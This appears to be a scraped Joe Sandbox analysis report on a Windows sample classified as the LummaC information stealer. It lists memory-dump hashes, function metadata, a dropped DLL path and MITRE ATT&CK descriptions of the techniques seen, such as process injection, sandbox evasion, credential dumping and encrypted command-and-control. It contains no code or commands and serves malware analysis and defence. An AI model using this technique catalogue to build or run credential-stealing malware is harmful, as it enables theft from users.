Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa51dd410144a7ec6d2b7c5d7ec5bcf7f612f2dedc426fb808d916e582b817fd
Instruction ID: 33f7984aeeaa51cb060b2905d47f4685b4ebe699b0ecf379ec62389db77aefd4
Opcode Fuzzy Hash: aa51dd410144a7ec6d2b7c5d7ec5bcf7f612f2dedc426fb808d916e582b817fd
Instruction Fuzzy Hash: C3C01233D94531878B588914DC610B466241B5621471EAB24CC5F73750D9148D04A5C8

Function 00543013 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f7dc1c8bdec7ae37c4d310c7025c86fc29c100fd1112718257ef14eeac4a174
Instruction ID: 0243c594943113aa5485b13da5d39673f1db9e26ba34efaf07c2a8db688b6bd1
Opcode Fuzzy Hash: 7f7dc1c8bdec7ae37c4d310c7025c86fc29c100fd1112718257ef14eeac4a174
Instruction Fuzzy Hash: F7B092A6C0201296A1917A503C4A43BB43429A3604F452474E80A22342EA16D21E605B

Function 0053D231 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c545c53ca369a8780d52848b2d877f591d1f669f481a18ce7a704a2e29a8ee47
Instruction ID: 35717a94aa6a9b1c44ad4bda1de8725a73e2619146e911c448e77a5b1109dd7a
Opcode Fuzzy Hash: c545c53ca369a8780d52848b2d877f591d1f669f481a18ce7a704a2e29a8ee47
Instruction Fuzzy Hash: FFA00415C5DD15C745505D1D5C10174F1355557131F557340D574333DD5770D504F5CC

Function 0052BE81 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3ddada63cd3c6e81c12a419534a95b1f5a3f944651421f192f81ce2313e682
Instruction ID: acecd5ab707af9f1c5b6e2c1036e5b6991a78d1c41b40e167ef9a4c71bee0b32
Opcode Fuzzy Hash: fd3ddada63cd3c6e81c12a419534a95b1f5a3f944651421f192f81ce2313e682
Instruction Fuzzy Hash: DFA00270E481208BD3088E18D5507B1E23D9B9F305F103419D4497B5D2CEE7EC44961C

Function 0053F337 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5e9566a94a2afa42257f26e5b791d59a7cda0470a9036a13c6d677df916e34
Instruction ID: a8d1871b581a708b3f32e274e0941be25da9a20ca480e99ad83b16e2fdcfa4ea
Opcode Fuzzy Hash: df5e9566a94a2afa42257f26e5b791d59a7cda0470a9036a13c6d677df916e34
Instruction Fuzzy Hash: 0D900230D495018681408E08D440470E278931B152F103400D008F3022C650D454560C

Function 0053B4B7 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2e4c35d31675d6e1fa08d18a5286ccce933c216dda4ce84708649710e7ae84f
Instruction ID: 27e3844d4ba1c896f8b8267dd14cb4cf791ff99dece38d59eba63b6f2bb77fff
Opcode Fuzzy Hash: d2e4c35d31675d6e1fa08d18a5286ccce933c216dda4ce84708649710e7ae84f
Instruction Fuzzy Hash: 7F900220D48500CA81008E0895404B0E278561F201F183400D008F7011CB54D404562C

Function 00536F47 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1984555595.0000000000521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00520000, based on PE: true

Associated: 00000002.00000002.1984537557.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_520000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954ece33a410eda268678a975402f4e112e9c9f14bd46a899f1b4fb684d97045
Instruction ID: aecfc5dac79152780b34a8fb92bfdc95fb1003f949280e63fc4d3ae86eb85c79
Opcode Fuzzy Hash: 954ece33a410eda268678a975402f4e112e9c9f14bd46a899f1b4fb684d97045
Instruction Fuzzy Hash: FC900220D885048AD1008E089480474E279621B141F143400D008F3011C650D858954C

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report gFCeeWNTvZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\glfw.3927611081.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
gFCeeWNTvZ.exe

Function 64608848 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 378
windowregistrylibraryCOMMON

Function 6460496F Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 330
stringCOMMON

Function 6460C519 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 297
windowCOMMON

Function 6460998C Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 94
COMMON

Function 6460BB1B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66
registryCOMMON

Function 6460309B Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63
COMMON

Function 6460BC57 Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Function 6460EC78 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147
COMMON

Function 6460EBE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Function 64609B0E Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Function 646021F7 Relevance: 66.7, APIs: 18, Strings: 20, Instructions: 234
libraryloaderstringCOMMON

Function 64601B16 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 231
stringCOMMON

Function 646025A0 Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 395
librarystringCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre